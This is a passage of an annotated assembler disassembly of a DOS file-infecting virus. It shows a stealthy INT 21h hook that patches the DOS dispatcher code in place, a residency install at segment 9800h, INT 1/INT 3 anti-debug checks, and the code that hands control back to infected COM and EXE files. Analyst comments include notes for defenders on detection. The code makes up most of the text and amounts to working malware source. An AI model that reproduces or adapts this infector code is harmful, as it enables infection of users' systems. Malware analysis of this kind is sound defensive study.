pop ax ;1791 58
retn ;1792 C3
s_1769 endp
;================================================================
; New int 21h service routine
;----------------------------------------------------------------
;<---- 10 bytes to identify resident virus
; Resident INT 21h hook. It is not reached through the IVT: s_17BB
; overwrites 5 bytes inside the DOS INT 21h dispatcher with a
; JMP FAR 9800:d_0413, so execution arrives here from within DOS
; with the service number still in AH.
; Defender note: because the IVT entry for INT 21h is unchanged, a
; vector-table check will not detect this; compare the dispatcher
; code itself (or inspect segment 9800h) - the first 0Ah bytes
; below are what s_17BB uses as its own "already resident" test.
d_0413: pushf ;1793 9C
cmp ah,40h ;write handle ? ;1794 80 FC 40
jne l_179F ;-> no ;1797 75 06
call s_1727 ;write handle service routine ;1799 E8 FF8B
jmp short l_17A7 ;179C EB 09
nop ;179E 90
l_179F: cmp ah,4Bh ;Load & Execute ? ;179F 80 FC 4B
jne l_17A7 ;-> no ;17A2 75 03
call s_1769 ;Load & Execute service routine ;17A4 E8 FFC2
l_17A7: popf ;17A7 9D
;================================================================
; Execute substituted code and jump into old int 21h service
; d_0428/d_042B are filled at install time with the `cmp ah,imm8`
; + `jcc rel8` pair that the far jump displaced; d_0547 and d_049D
; hold the two possible continuation addresses inside DOS.
;----------------------------------------------------------------
;<- four bytes from int 21h service
d_0428: cmp ah,51h ;17A8 80 FC 51
d_042B: je l_17B2 ;17AB 74 05
jmp dword ptr cs:[547h] ;17AD 2E: FF 2E 0547
l_17B2: jmp dword ptr cs:[49Dh] ;17B2 2E: FF 2E 049D
d_0437 dw 0000h,02A0h ;dword = code length ;17B7 00 00 A0 02
;================================================================
; Make virus resident
;----------------------------------------------------------------
;----------------------------------------------------------------
; s_17BB - install the resident copy
; In:  ds = cs
; 1. Residency test: compare 0Ah bytes at cs:[413h] with 9800:[413h];
;    equal -> already installed, exit.
; 2. Take the INT 21h vector from the IVT (0:84h/86h) and scan up to
;    80h bytes of the handler for the pair 80h FCh (a `cmp ah,imm8`)
;    followed by a short conditional jump; copy those 4 bytes into
;    d_0428/d_042B and compute the jump's target into d_049D, the
;    fall-through address into d_0547.
; 3. Copy 612h bytes of the virus to 9800:0000 - no memory
;    allocation call is visible, the segment is simply assumed free.
; 4. Overwrite 5 bytes of the dispatcher, starting at the cmp, with
;    the JMP FAR pattern at d_04F2 (EA, offset d_0413, 9800h).
; Defender notes: the IVT is never written, so the hook is only
; visible by checking the integrity of the DOS dispatcher code;
; the fixed segment 9800h is a second place to look.
; Clobb: ax, bx, cx, si, di, es, flags (interrupts off throughout)
;----------------------------------------------------------------
s_17BB proc near
cli ;disable interrupts ;17BB FA
push es ;17BC 06
lea si,cs:[413h] ;l_1793 ;17BD 8D 36 0413
mov di,si ;17C1 8B FE
mov cx,9800h ;resident virus segment ;17C3 B9 9800
mov es,cx ;17C6 8E C1
mov cx,0Ah ;17C8 B9 000A
repe cmpsb ;17CB F3/ A6
cmp cx,0 ;17CD 83 F9 00
pop es ;17D0 07
jz l_181A ;-> already resident ;17D1 74 47
mov bx,es:[84h] ;int 21h - offset ;17D3 26: 8B 1E 0084
mov ax,es:[86h] ;int 21h - segment ;17D8 26: A1 0086
mov word ptr ds:[549h],ax ;l_18C9 ;17DC A3 0549
mov word ptr ds:[49Fh],ax ;l_181F ;17DF A3 049F
mov di,bx ;17E2 8B FB
mov es,ax ;17E4 8E C0
mov cx,80h ;17E6 B9 0080
mov al,80h ;17E9 B0 80
l_17EB: repne scasb ;find byte 80h ;17EB F2/ AE
cmp cx,0 ;17ED 83 F9 00
je l_1870 ;-> not found, EXIT ;17F0 74 7E
cmp byte ptr es:[di],0FCh ;17F2 26: 80 3D FC
jne l_17EB ;-> find another place ;17F6 75 F3
;<- get four bytes from int 21h service
; es:di now points at the FCh byte: [di-1]=80h [di]=FCh [di+1]=imm8
; [di+2]=jcc opcode [di+3]=rel8
mov al,es:[di+2] ;17F8 26: 8A 45 02
mov byte ptr cs:[42Bh],al ;l_17AB ;17FC 2E: A2 042B
mov al,es:[di-1] ;1800 26: 8A 45 FF
mov byte ptr cs:[428h],al ;l_17A8 ;1804 2E: A2 0428
mov al,es:[di] ;1808 26: 8A 05
mov byte ptr cs:[429h],al ;l_17A8+1 ;180B 2E: A2 0429
mov al,es:[di+1] ;180F 26: 8A 45 01
mov byte ptr cs:[42Ah],al ;l_17A8+2 ;1813 2E: A2 042A
jmp short l_1821 ;1817 EB 08
nop ;1819 90
;<- already resident
l_181A: jmp short l_1870 ;-> EXIT ;181A EB 54
nop ;181C 90
d_049D dw 140Dh ;address to jump1 into ;181D 0D 14
d_049F dw 0278h ;old int 21h segment ;181F 78 02
; jump target = (di+4) + sign-extended rel8; the sign extension is
; done by subtracting 100h when rel8 >= 80h
l_1821: mov ax,di ;1821 8B C7
add ax,4 ;next to conditional jmp;1823 05 0004
xor bx,bx ;1826 33 DB
mov bl,es:[di+3] ;jump length ;1828 26: 8A 5D 03
add ax,bx ;jump address ;182C 03 C3
mov word ptr ds:[49Dh],ax ;l_181D ;182E A3 049D
cmp byte ptr es:[di+3],80h ;1831 26: 80 7D 03 80
jb l_183E ;-> forward jump ;1836 72 06
;<- jump backwards
sub ax,100h ;minus carry ;1838 2D 0100
mov word ptr ds:[49Dh],ax ;l_181D ;183B A3 049D
l_183E: add di,4 ;second condition addrs ;183E 83 C7 04
mov word ptr ds:[547h],di ;1841 89 3E 0547
sub di,5 ;<- area to substitute ;1845 83 EF 05
push es ;1848 06
push di ;1849 57
mov dx,9800h ;resident virus segment ;184A BA 9800
mov word ptr cs:[4F5h],dx ;184D 2E: 89 16 04F5
mov es,dx ;1852 8E C2
xor si,si ;1854 33 F6
xor di,di ;1856 33 FF
mov cx,612h ;l_1380 -> l_1992 ;1858 B9 0612
rep movsb ;copy virus code ;185B F3/ A4
;<----- take control over int 21h
lea cx,cs:[413h] ;offset l_1793 ;185D 8D 0E 0413
mov word ptr ds:[4F3h],cx ;1861 89 0E 04F3
pop di ;1865 5F
pop es ;1866 07
mov cx,5 ;1867 B9 0005
lea si,cs:[4F2h] ;offset l_1792 ;186A 8D 36 04F2
rep movsb ;patch DOS code in place ;186E F3/ A4
l_1870: sti ;1870 FB
retn ;1871 C3
s_17BB endp
;<---- instruction pattern to write over int 21h code
d_04F2 db 0EAh ;JMP FAR 9800:l_1793 ;1872 EA
d_04F3 dw 0 ;:= offset l_1793 ;1873 00 00
d_04F5 dw 9800h ;resident virus segment ;1875 00 98
;================================================
; saved 32 victim bytes
;------------------------------------------------
d_04F7 db 0E9h,0FFh,11h ;1877 E9 FF 11
db 'Converted',0,0,0,0 ;187A 43 6F 6E 76 65 72
;1880 74 65 64 00 00 00 00
db 'MZ' ;1887 4D 5A
db 0EAh,01h,09h,00h,08h,00h ;1889 EA 01 09 00 08 00
db 20h,00h,00h,00h,0FFh,0FFh ;188F 20 00 00 00 FF FF
db 98h,00h ;1895 98 00 00
;-----------------------------------
db 48 dup (0) ;not used ;1897 0030[00]
d_0547 dw 146Ch ;address to jump2 into ;18C7 6C 14
d_0549 dw 0278h ;old int 21h segment ;18C9 78 02
;<------ code written to the file when paragraph alignment is needed
db 0E9h ;jmp l_18CF ;18CB E9
d_054C dw 052Ch ;distance of jump ;18CC 2C 05
db 0 ;18CE 00
;================================================================
; EXE virus entry
;----------------------------------------------------------------
; Common entry (offset 54Fh) reached from both stubs. Saves the
; registers the victim will need, sets ds = cs, runs the anti-debug
; chain that ends in the residency install (s_1938), then dispatches
; on the file-type flag d_0349: 0FFh -> l_18E5 (COM), else l_1953.
l_18CF: push bx ;18CF 53
push cx ;18D0 51
push es ;18D1 06
push ds ;18D2 1E
pushf ;18D3 9C
mov ax,cs ;18D4 8C C8
mov ds,ax ;18D6 8E D8
call s_1938 ;make virus resident ;18D8 E8 005D
cmp byte ptr ds:[349h],0FFh ;l_16C9 (0FFh=COM) ;18DB 80 3E 0349 FF
je l_18E5 ;18E0 74 03
jmp short l_1953 ;-> EXE victim ;18E2 EB 6F
nop ;18E4 90
;================================================================
; End of virus code - file *.COM
;----------------------------------------------------------------
; Hand-off to a COM victim: restore the saved registers, build the
; far pointer ES:100h (PSP segment, standard COM entry) in
; d_05B4/d_05B6, zero the scratch registers and jump.
l_18E5: popf ;18E5 9D
pop ds ;18E6 1F
pop es ;18E7 07
pop cx ;18E8 59
pop bx ;18E9 5B
mov word ptr cs:[5B4h],100h ;l_1934 = victim IP ;18EA 2E: C7 06 05B4 0100
mov ax,es ;18F1 8C C0
mov word ptr cs:[5B6h],ax ;l_1936 = victim CS ;18F3 2E: A3 05B6
call s_16CA ;init registers ;18F7 E8 FDD0
jmp dword ptr cs:[5B4h] ;l_1934 -> run victim ;18FA 2E: FF 2E 05B4
;<--- victim name
d_057F db 'A:\SYS.COM' ;18FF 41 3A 5C 53 59 53
;1905 2E 43 4F 4D
db 0,'XE',0,'E',0 ;1909 00 58 45 00 45 00
db 9 dup (0) ;190F 0009[00]
;================================================================
; ANTI-DEBUG - make virus resident
;----------------------------------------------------------------
;----------------------------------------------------------------
; s_1918 - last step of the anti-debug chain: installs the resident
; copy only if ax still holds the 3000h that s_1925 loaded before
; calling the INT 3 handler; otherwise it jumps back into s_1925's
; loop (l_1925), so a debugger that alters ax never reaches s_17BB
; and the code spins instead.
;----------------------------------------------------------------
s_1918 proc near
cmp ax,3000h ;1918 3D 3000
jne l_1925 ;-> int 3 ;191B 75 08
call s_17BB ;-> make virus resident ;191D E8 FE9B
retn ;1920 C3
s_1918 endp
d_05A1 dw 002Ah ;victim SS (rel) ;1921 2A 00
d_05A3 dw 1388h ;victim SP ;1923 88 13
;================================================================
; ANTI-DEBUG - call int 3 (Breakpoint)
;----------------------------------------------------------------
;----------------------------------------------------------------
; s_1925 - call the INT 3 handler directly through the IVT
; (far call to 0:0Ch, es = 0 from s_1948) with ax = 3000h and loop
; until ax comes back unchanged. With the stock DOS handler (an
; iret) this passes at once; a debugger's breakpoint handler that
; changes ax keeps the loop going.
; Note: the `push ax` is never matched by a pop in this routine;
; the pushed word is left on the stack.
;----------------------------------------------------------------
s_1925 proc near
l_1925: mov ax,3000h ;Flag register ;1925 B8 3000
push ax ;1928 50
l_1929: call dword ptr es:[0Ch] ;int 3 (Breakpoint) ;1929 26: FF 1E 000C
cmp ax,3000h ;192E 3D 3000
jne l_1929 ;1931 75 F6
retn ;1933 C3
s_1925 endp
d_05B4 dw 0000h ;victim IP ;1934 00 00
d_05B6 dw 000Bh ;victim CS (rel) ;1936 0B 00
;================================================================
; Make virus resident
;----------------------------------------------------------------
;----------------------------------------------------------------
; s_1938 - anti-debug gate in front of the residency install
; Calls the INT 1 (single-step) handler directly with ax = 0; if ax
; is still 0 afterwards it runs the INT 3 check (s_1925) and then
; s_1918 -> s_17BB. Any handler that modifies ax (e.g. a debugger's)
; skips installation.
; Note the fall-through: after l_1947 there is no ret, so control
; continues into s_1948, invokes the INT 1 handler a second time and
; returns with es = 0. Both callers (l_18E5 / l_1953) pop es from
; the stack afterwards, so this has no visible effect there.
;----------------------------------------------------------------
s_1938 proc near
push es ;1938 06
call s_1948 ;-> INT 1 (single step) ;1939 E8 000C
cmp ax,0 ;193C 3D 0000
jne l_1947 ;193F 75 06
call s_1925 ;-> INT 3 (Breakpoint) ;1941 E8 FFE1
call s_1918 ;-> reside virus ;1944 E8 FFD1
l_1947: pop es ;1947 07
;================================================================
; ANTI-DEBUG - call int 1 = Single Step
; pushf + far call through 0:4 mimics an INT 1 frame; the handler's
; iret returns to the retn below.
;----------------------------------------------------------------
s_1948: pushf ;1948 9C
xor ax,ax ;1949 33 C0
mov es,ax ;194B 8E C0
call dword ptr es:[4h] ;int 1 ;194D 26: FF 1E 0004
retn ;1952 C3
s_1938 endp
;================================================================
; End of virus code - file *.EXE
;----------------------------------------------------------------
; Hand-off to an EXE victim: restore the saved registers, relocate
; the victim's SS and CS by the load segment (es + 10h = PSP + one
; page of PSP), restore SP, zero the scratch registers and jump to
; the original CS:IP kept in d_05B4/d_05B6.
l_1953: popf ;1953 9D
pop ds ;1954 1F
pop es ;1955 07
pop cx ;1956 59
pop bx ;1957 5B
mov ax,es ;1958 8C C0
add ax,10h ;relocating value ;195A 05 0010
mov dx,ax ;195D 8B D0
mov bp,word ptr cs:[5A1h] ;l_1921 = victim SS ;195F 2E: 8B 2E 05A1
add bp,ax ;1964 03 E8
mov ss,bp ;1966 8E D5
mov bp,word ptr cs:[5A3h] ;l_1923 = victim SP ;1968 2E: 8B 2E 05A3
mov sp,bp ;196D 8B E5
mov ax,dx ;196F 8B C2
add word ptr cs:[5B6h],ax ;l_1936 - CS relocation ;1971 2E: 01 06 05B6
call s_16CA ;init registers ;1976 E8 FD51
jmp dword ptr cs:[5B4h] ;-> run victim ;1979 2E: FF 2E 05B4
db 20 dup (0) ;COM file stack ;197E 0014[00]
d_0612 label byte ;end of virus image (612h bytes) ;1992h
seg_a ends
end start